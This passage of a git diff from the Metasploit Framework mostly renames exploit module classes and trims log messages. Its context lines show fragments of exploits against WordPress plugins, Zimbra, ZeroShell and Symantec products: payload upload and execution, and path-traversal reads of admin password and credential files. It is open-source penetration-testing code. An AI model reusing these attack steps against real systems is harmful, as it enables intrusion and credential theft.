normalize_uri(wordpress_url_backend, 'admin.php'), @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) ) diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index f683aa071f..620594fc2f 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload") + print_status("Preparing payload") unique_name = Rex::Text.rand_text_alpha(10) payload_name = "#{unique_name}.php" symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data = generate_mime_message(payload, payload_name, unique_name, symposium_url) symposium_url = normalize_uri(symposium_url, 'index.php') - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => symposium_url, @@ -74,22 +74,22 @@ class Metasploit3 < Msf::Exploit::Remote ) if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") else if res.nil? fail_with(Failure::Unreachable, "No response from the target") else - vprint_error("#{peer} - HTTP Status: #{res.code}") - vprint_error("#{peer} - Server returned: #{res.body}") + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index a38a65f0f1..8380660362 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient @@ -106,44 +106,44 @@ class Metasploit3 < Msf::Exploit::Remote @auth = require_auth? if @auth - print_status("#{peer} - Trying to login...") + print_status("Trying to login...") @cookie = wordpress_login(@user, @password) if @cookie.nil? fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful") end - print_status("#{peer} - login successful") + print_status("login successful") else - print_status("#{peer} - Trying unauthenticated exploitation...") + print_status("Trying unauthenticated exploitation...") end if datastore['POSTID'] and datastore['POSTID'] != 0 @post_id = datastore['POSTID'] - print_status("#{peer} - Using the user supplied POST ID #{@post_id}...") + print_status("Using the user supplied POST ID #{@post_id}...") else - print_status("#{peer} - Trying to get posts from feed...") + print_status("Trying to get posts from feed...") all_posts = wordpress_get_all_blog_posts_via_feed # First try all blog posts provided by feed if all_posts all_posts.each do |p| - vprint_status("#{peer} - Checking #{p}...") + vprint_status("Checking #{p}...") enabled = wordpress_post_comments_enabled?(p, @cookie) @post_id = get_post_id_from_body(enabled) if @post_id - print_status("#{peer} - Found Post POST ID #{@post_id}...") + print_status("Found Post POST ID #{@post_id}...") break end end end # if nothing found, bruteforce a post id unless @post_id - print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...") + print_status("Nothing found. Trying to brute force a valid POST ID...") min_post_id = datastore['MIN_POST_ID'] max_post_id = datastore['MAX_POST_ID'] @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie) if @post_id.nil? fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment") else - print_status("#{peer} - Using the brute forced POST ID #{@post_id}...") + print_status("Using the brute forced POST ID #{@post_id}...") end end end @@ -151,14 +151,14 @@ class Metasploit3 < Msf::Exploit::Remote random_test = rand_text_alpha(64) @sum = Rex::Text.sha1(random_test) - print_status("#{peer} - Injecting the PHP Code in a comment...") + print_status("Injecting the PHP Code in a comment...") text = Rex::Text::rand_text_alpha(10) post_uri = post_comment(text) if post_uri.nil? fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned") end - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") options = { 'method' => 'GET', 'uri' => post_uri, diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index cba67e8185..975d7d004a 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index d51f8957e1..bcf004dac6 100644 --- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /#{php_page_name}/ - print_good("#{peer} - Payload uploaded as #{php_page_name}") + print_good("Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Server did not answer") end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index 5643f7fef8..4e73bdf79d 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # forward to profile.php or other page? if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -117,29 +117,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to get nonce") + print_status("Trying to get nonce") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - print_status("#{peer} - Got nonce #{nonce}") + print_status("Got nonce #{nonce}") - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") file_path = upload_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error uploading file") + print_error("Error uploading file") return end - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( 'uri' => file_path, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index e48bbf5a9d..4e4ab2070c 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_uri = normalize_uri(target_uri.path, wp_content_dir, 'uploads', 'wysija', 'themes', theme_name, payload_name) - print_status("#{peer} - Uploading payload to #{payload_uri}") + print_status("Uploading payload to #{payload_uri}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Exploit::Remote # the theme folder (manual cleanup) register_files_for_cleanup('style.css', payload_name) - print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.") + print_warning("The theme folder #{theme_name} can not be removed. Please delete it manually.") - print_status("#{peer} - Executing payload #{payload_uri}") + print_status("Executing payload #{payload_uri}") send_request_cgi( 'uri' => payload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 410ba14ceb..5877144ba3 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << "\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{@payload_name})") + print_status("Sending PHP payload (#{@payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}?upload", @@ -110,11 +110,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 302 - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{@payload_name})") + print_status("Executing PHP payload (#{@payload_name})") # Execute our payload res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 2fb30b494a..2e6345440a 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect ZeroShell") + print_status("Trying to detect ZeroShell") res = send_request_cgi({ 'method' => 'GET', @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieve admin password using unauthenticated LFI def password rootpw = "../../../var/register/system/ldap/rootpw" - print_status("#{peer} - Retrieving cleartext admin password") + print_status("Retrieving cleartext admin password") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body !~ /not found/ res.body =~ /^(.*)$/ pass = $1 - print_status("#{peer} - Password retrieved [ #{pass} ]") + print_status("Password retrieved [ #{pass} ]") return pass else return nil @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote # Login using the retrieved password and grab the session key from the response body. def login(admin_password) - print_status("#{peer} - Log in and retrieving session key") + print_status("Log in and retrieving session key") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /STk=([a-zA-Z0-9]+)&Action/ sessionkey = $1 - print_status("#{peer} - Session key retrieved [ #{sessionkey} ]") + print_status("Session key retrieved [ #{sessionkey} ]") return sessionkey else fail_with(Failure::Unknown, "#{peer} - Retrieving session key failed!") diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index c126de0f39..c11f84545f 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting login credentials...") + print_status("Getting login credentials...") res = send_traversal_query(traversal_path("conf/localconfig.xml")) unless res and res.code == 200 @@ -115,8 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") end - print_good("#{peer} - Got login credentials!") - print_status("#{peer} - Getting auth token...") + print_good("Got login credentials!") + print_status("Getting auth token...") soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote end @cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" - print_good("#{peer} - Got auth token!") + print_good("Got auth token!") #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_elf = generate_payload_exe #upload payload - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = upload_file(payload_name, payload_elf) unless res and res.code == 200 @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end #upload jsp stager - print_status("#{peer} - Uploading jsp stager") + print_status("Uploading jsp stager") res = upload_file(stager_name, stager) unless res and res.code == 200 @@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote "../jetty/webapps/zimbra/downloads/#{payload_name}" ) - print_status("#{peer} - Executing payload on /downloads/#{stager_name}") + print_status("Executing payload on /downloads/#{stager_name}") res = send_request_cgi({ 'uri' => normalize_uri("downloads", stager_name), diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 5add6e428a..e1ff8e7aa0 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "action=login&view=version&username=#{user}&password=#{pass}" # login and retrieve software version - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /<title>ZM - Login<\/title>/ - vprint_error("#{peer} - Service found, but authentication failed") + vprint_error("Service found, but authentication failed") return Exploit::CheckCode::Detected elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote command = Rex::Text.uri_encode(payload.encoded) # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -121,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, "#{peer} - Connection failed") end - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") # send payload - print_status("#{peer} - Sending payload (#{command.length} bytes)") + print_status("Sending payload (#{command.length} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => "#{cookie}" }) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index 5a398002a8..d087d53acc 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -138,18 +138,18 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path token, sid = get_csfr_info(base) - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") user_salt_cookie = login(base, token, sid) - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_good("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'} cookie = "#{sid}; #{user_salt_cookie}" token = get_csfr_info(base, '', cookie, vars)[0] - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") exec(base, token, sid, user_salt_cookie) end diff --git a/modules/exploits/unix/x11/x11_keyboard_exec.rb b/modules/exploits/unix/x11/x11_keyboard_exec.rb index 00ba8cad4b..3b07a8c264 100644 --- a/modules/exploits/unix/x11/x11_keyboard_exec.rb +++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index efed29d6fa..3e925831b0 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index 7088c01e04..9496760df7 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index b85a120157..1f62f84c1e 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include REXML @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~3950 execute_cmdstager({:flavor => :vbs, :linemax => 3950}) end diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 48b9a23fb3..e1ae91de8e 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index d766eb6294..1e464e7b5d 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index d215a55d1a..1100693c5a 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -229,21 +229,21 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Leaking the JBoss deployment directory...") + print_status("Leaking the JBoss deployment directory...") jboss_path =jboss_deploy_path if jboss_path.nil? fail_with(Failure::Unknown, "#{peer} - Failed to disclose the JBoss deployment directory") end - print_status("#{peer} - Building WAR payload...") + print_status("Building WAR payload...") app_name = Rex::Text.rand_text_alpha(4 + rand(4)) war_name = "#{app_name}.war" war = payload.encoded_war({ :app_name => app_name }).to_s deploy_dir = "..#{jboss_path}" - print_status("#{peer} - Uploading WAR payload...") + print_status("Uploading WAR payload...") res = upload_war(war_name, war, deploy_dir) diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index 96d629dcf2..78276f632f 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index 026513e734..f85e5a0d20 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index ef09da8928..aab4bbef64 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index d1c08fd8c3..c4ef38be85 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index a6eb07f123..6b1392a2b6 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 8670ef8c98..f67e8af3b3 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 13431a8ea1..85ca160d70 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index 0ac6087379..9c34ac5621 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 8145935ad9..c2c7d89872 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index bfe484f24f..1a8a8d5885 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 61ae466927..5947954bba 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index ade7cf8ecf..a23793e2e1 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ 